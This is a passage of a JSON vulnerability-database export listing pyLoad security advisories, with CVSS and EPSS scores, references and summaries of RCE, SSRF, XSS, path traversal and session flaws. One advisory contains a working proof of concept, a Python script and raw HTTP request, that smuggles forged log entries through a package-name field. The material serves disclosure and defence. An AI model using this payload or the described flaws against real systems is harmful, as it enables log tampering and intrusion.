Upload.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-47890","reference_id":"","reference_type":"","scores":[{"value":"0.00343","scoring_system":"epss","scoring_elements":"0.57333","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-47890"},{"reference_url":"https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-47890","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-47890"},{"reference_url":"https://github.com/advisories/GHSA-h73m-pcfw-25h2","reference_id":"GHSA-h73m-pcfw-25h2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h73m-pcfw-25h2"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2","reference_id":"GHSA-h73m-pcfw-25h2","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:5
6:34Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2"},{"reference_url":"http://pyload.com","reference_id":"pyload.com","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/"}],"url":"http://pyload.com"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81716?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev75","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-ktv2-2ay9-g7be"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-u
wgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xkag-9scb-bfhk"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev75"}],"aliases":["CVE-2023-47890","GHSA-h73m-pcfw-25h2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d2gv-3uu7-gudh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71538?format=json","vulnerability_id":"VCID-d7dw-6vnb-43a9","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). 
A non-admin user with SETTINGS permission can change this path to achieve remote code execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35463","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33099","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35463"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35463","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35463"},{"reference_url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_id":"c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/"}],"url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"GHSA-w48f-wwwf-f5fr","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr"}],"fixed_packages":[],"aliases":["C
VE-2026-35463","GHSA-w48f-wwwf-f5fr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d7dw-6vnb-43a9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360752?format=json","vulnerability_id":"VCID-ekx7-75uk-f7h5","summary":"Pyload log Injection via API /json/add_package in add_name parameter\n### Summary\nA log injection vulnerability was identified in `pyload` in API `/json/add_package`. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by `pyload`.\n### Details\n`pyload` will generate a log entry when creating new package using API `/json/add_package`. This entry will be in the form of `Added package 'NAME_OF_PACKAGE' containing 'NUMBER_OF_LINKS' links`. However, when supplied with the name of new package containing a newline, this newline is not properly escaped. Newlines are also the delimiter between log entries. This allows the attacker to inject new log entries into the log file.\n\n### PoC\nRun `pyload` in the default configuration by running the following command\n```\npyload\n```\nWe can now sign in as the pyload user who at least have add packages permissions. In my example, I will use the admin account to demonstrate this vulnerability. 
Now as an admin user, view the logs at `http://localhost:8000/logs`\n<img width=\"1918\" height=\"912\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e6510af6-768b-4ddd-a4f2-3972618e1d37\" />\nAny attacker who at least have add packages permissions can now make the following request by crafting a python code to inject arbitrary logs.\n```\nimport requests\n\nsession = requests.session()\n\nburp0_url = \"http://localhost:8000/json/add_package\"\nburp0_cookies = {\"pyload_session_8000\": \"SESSION-ID-HERE\"}\nburp0_headers = {\"sec-ch-ua-platform\": \"\\\"Windows\\\"\", \"Accept-Language\": \"en-US,en;q=0.9\", \"sec-ch-ua\": \"\\\"Not)A;Brand\\\";v=\\\"8\\\", \\\"Chromium\\\";v=\\\"138\\\"\", \"sec-ch-ua-mobile\": \"?0\", \"X-Requested-With\": \"XMLHttpRequest\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\", \"Accept\": \"*/*\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf\", \"Origin\": \"http://localhost:8000\", \"Sec-Fetch-Site\": \"same-origin\", \"Sec-Fetch-Mode\": \"cors\", \"Sec-Fetch-Dest\": \"empty\", \"Referer\": \"http://localhost:8000/collector\", \"Accept-Encoding\": \"gzip, deflate, br\", \"Connection\": \"keep-alive\"}\nburp0_data = \"------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_name\\\"\\r\\n\\r\\nFake new package containing 1 links\\r\\n[2025-07-23 04:32:19]  PWNED               SeaWind  GET PWNED\\r\\n[2025-07-23 04:32:19]  INFO                pyload Added package Normal package\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_links\\\"\\r\\n\\r\\n123\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_password\\\"\\r\\n\\r\\n123\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_file\\\"; 
filename=\\\"tt\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_dest\\\"\\r\\n\\r\\n0\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\\r\\n\"\nsession.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\n```\nThe Burpsuite HTTP Request for the above code\n```\nPOST /json/add_package HTTP/1.1\nHost: localhost:8000\nContent-Length: 799\nsec-ch-ua-platform: \"Windows\"\nAccept-Language: en-US,en;q=0.9\nsec-ch-ua: \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\"\nsec-ch-ua-mobile: ?0\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf\nOrigin: http://localhost:8000\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost:8000/collector\nAccept-Encoding: gzip, deflate, br\nCookie: pyload_session_8000=SESSIONS-ID-HERE\nConnection: keep-alive\n\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_name\"\n\nFake new package containing 1 links\n[2025-07-23 04:32:19]  HACKER               SeaWind  GET PWNED\n[2025-07-23 04:32:19]  INFO               pyload Added package Normal package\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_links\"\n\n123\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_password\"\n\n123\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_file\"; filename=\"tt\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_dest\"\n\n0\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\n\n```\nAfter executing the following python code and send the request successfully, if we 
now were to look at the logs again, we see that the entry has successfully been injected.\n<img width=\"1920\" height=\"911\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0e77c7ac-e5f6-4227-843a-ef548071bf02\" />\n\n### Impact\nForged or otherwise corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act.","references":[{"reference_url":"https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3"},{"reference_url":"https://github.com/advisories/GHSA-3wwm-hjv7-23r3","reference_id":"GHSA-3wwm-hjv7-23r3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3wwm-hjv7-23r3"}],"fixed_packages":[],"aliases":["GHSA-3wwm-hjv7-23r3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ekx7-75uk-f7h5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70631?format=json","vulnerability_id":"VCID-fygw-7zvj-h3d5","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. 
The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42314","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18668","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42314"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-128.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-128.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42314","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42314"},{"reference_url":"https://github.com/advisories/GHSA-97r3-5w84-r4q8","reference_id":"GHSA-97r3-5w84-r4q8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-97r3-5w84-r4q8"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8","reference_id":"GHSA-97r3-5w84-r4q8","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"va
lue":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:33:35Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42314","GHSA-97r3-5w84-r4q8","PYSEC-2026-128"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fygw-7zvj-h3d5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53009?format=json","vulnerability_id":"VCID-g4ak-155r-qufh","summary":"pyload is an open-source Download Manager written in pure Python. An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution. 
There is no fix available at the time of publication.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32880","reference_id":"","reference_type":"","scores":[{"value":"0.04609","scoring_system":"epss","scoring_elements":"0.89494","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32880"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32880","reference_id":"CVE-2024-32880","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32880"},{"reference_url":"https://github.com/advisories/GHSA-3f7w-p8vr-4v5f","reference_id":"GHSA-3f7w-p8vr-4v5f","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3f7w-p8vr-4v5f"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f","reference_id":"GHSA-3f7w-p8vr-4v5f","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-04-26T18:47:38Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f"}],"fixed_packages":[],"aliases":["CVE-2024-32880","GHSA-3f7w-p8vr-4v5f"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g4ak-155r-qufh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/77798?format=json","vulnerability_id":"VCID-hcq5-zndz-uucx","summary":"pyLoad 
is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, PyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init. Version 0.5.0b3.dev97 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.1008","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33992"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992"},{"reference_url":"https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8","reference_id":"b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/"}],"url":"https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8"},{"reference_url":"https://github.com/advisories/GHSA-m74m-f7cr-432x","reference_id":"GHSA-m74m-f7cr-432x","reference_type":"","scores":[{"val
ue":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m74m-f7cr-432x"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x","reference_id":"GHSA-m74m-f7cr-432x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x"}],"fixed_packages":[],"aliases":["CVE-2026-33992","GHSA-m74m-f7cr-432x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hcq5-zndz-uucx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/127977?format=json","vulnerability_id":"VCID-jhhh-f1ff-1bfk","summary":"pyLoad is a free and open-source download manager written in Python. In versions prior to 0.5.0b3.dev91, the pyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted. User-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow. 
CNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests. Version 0.5.0b3.dev91 contains a patch for the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61773","reference_id":"","reference_type":"","scores":[{"value":"0.00067","scoring_system":"epss","scoring_elements":"0.20965","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61773"},{"reference_url":"https://github.com/pyload/pyload/pull/4624","reference_id":"4624","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/pull/4624"},{"reference_url":"https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca","reference_id":"5823327d0b797161c7195a1f660266d30a69f0ca","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61773","reference_id":"CVE-2025-61773","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vul
n/detail/CVE-2025-61773"},{"reference_url":"https://github.com/advisories/GHSA-cjjf-27cc-pvmv","reference_id":"GHSA-cjjf-27cc-pvmv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjjf-27cc-pvmv"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv","reference_id":"GHSA-cjjf-27cc-pvmv","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34145?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91"}],"aliases":
["CVE-2025-61773","GHSA-cjjf-27cc-pvmv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jhhh-f1ff-1bfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80870?format=json","vulnerability_id":"VCID-kjru-xrvh-1bad","summary":"pyLoad is a free and open-source download manager written in Python. Versions up to and including 0.5.0b3.dev97 cache `role` and `permission` in the session at login and continue to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database. As a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions. This is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature. Commit e95804fb0d06cbb07d2ba380fc494d9ff89b68c1 contains a fix for the 